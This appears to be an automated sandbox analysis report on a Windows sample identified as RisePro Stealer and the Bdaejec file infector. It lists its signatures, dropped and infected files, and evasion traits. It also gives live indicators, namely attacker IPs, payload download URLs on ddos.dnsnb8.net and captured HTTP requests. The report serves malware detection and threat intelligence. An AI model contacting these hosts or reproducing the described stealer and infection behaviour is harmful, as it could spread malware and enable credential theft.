Windows Analysis Report
hunta[1].exe

Overview

General Information

Sample name: hunta[1].exe
Analysis ID: 1480972
MD5: 651de10cfaaa78be50eda9f3f0ce9ea7
SHA1: 6b922567fc5880e38fc9a3eacc24f6bab3785731
SHA256: e5cb4f3f8d41c28116b9ff3253ab5f6d6736e18da2d225cf15379954b2751643
Tags: exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: hunta[1].exe Avira: detected
Antivirus detection for URL or domain
Source: http://ddos.dnsnb8.net:799/cj//k2.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rars Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarA Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/ URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarppData Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar1 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarV Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/O Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar8 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/d Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rar5 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC: Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Avira: detection malicious, Label: W32/Jadtre.B
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MPGPH131\MPGPH131.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe ReversingLabs: Detection: 92%
Multi AV Scanner detection for submitted file
Source: hunta[1].exe ReversingLabs: Detection: 94%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: hunta[1].exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: hunta[1].exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 4_2_002129E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_00B529E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 4_2_00212B8C
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49707 -> 44.221.84.105:799
Source: global traffic TCP traffic: 192.168.2.10:49709 -> 193.233.132.62:50500
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View IP Address: 193.233.132.62 193.233.132.62
Source: Joe Sandbox View IP Address: 193.233.132.62 193.233.132.62
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E9DB60 recv,WSAStartup,closesocket,socket,connect,closesocket, 2_2_00E9DB60
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: WwKLWFk.exe, 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmp, WwKLWFk.exe, 00000004.00000003.1268128954.0000000000DF0000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1466940967.0000000000980000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/O
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/d
Source: WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarppData
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar1
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: WwKLWFk.exe, 00000004.00000002.1418971368.0000000001210000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar5
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rars
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.4.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.4.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.4.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.4.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.4.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.4.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.4.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.4.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.000000000105D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000002.3734938152.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT%
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTv
Source: SciTE.exe.4.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.4.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Installs a raw input device (often for capturing keystrokes)
Source: SciTE.exe.4.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_f59074ed-0

System Summary
barindex
PE file contains section with special chars
Source: hunta[1].exe Static PE information: section name:
Source: hunta[1].exe Static PE information: section name: .idata
Source: hunta[1].exe Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name: .idata
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name: .idata
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MyProg.exe.4.dr Static PE information: section name: Y|uR
PE file has a writeable .text section
Source: WwKLWFk.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\hunta[1].exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F04870 2_2_00F04870
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E82040 2_2_00E82040
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F0B800 2_2_00F0B800
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E9A100 2_2_00E9A100
